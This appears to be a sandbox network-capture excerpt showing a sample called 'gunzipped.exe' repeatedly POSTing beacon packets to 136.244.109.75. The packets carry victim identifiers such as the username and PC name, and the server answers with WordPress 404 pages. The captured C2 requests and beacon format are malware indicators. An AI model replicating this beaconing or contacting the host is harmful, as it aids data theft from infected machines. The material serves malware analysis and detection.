Apr 17, 2024 03:18:05.294476032 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:05.294516087 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:05.294559002 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49761	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:05.666466951 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:05.874942064 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:06.803118944 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:05 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:06.803180933 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:06.803220987 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:06.803258896 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:06.803303003 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:06.803345919 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:06.803385973 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:06.803426027 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:06.803466082 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:06.803512096 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49762	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:07.152096987 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:07.356178999 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:08.274482965 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:07 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:08.274544954 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:08.274588108 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:08.274626017 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:08.274665117 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:08.274704933 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:08.274748087 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:08.274790049 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:08.274827957 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:08.274871111 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49764	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:08.625525951 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
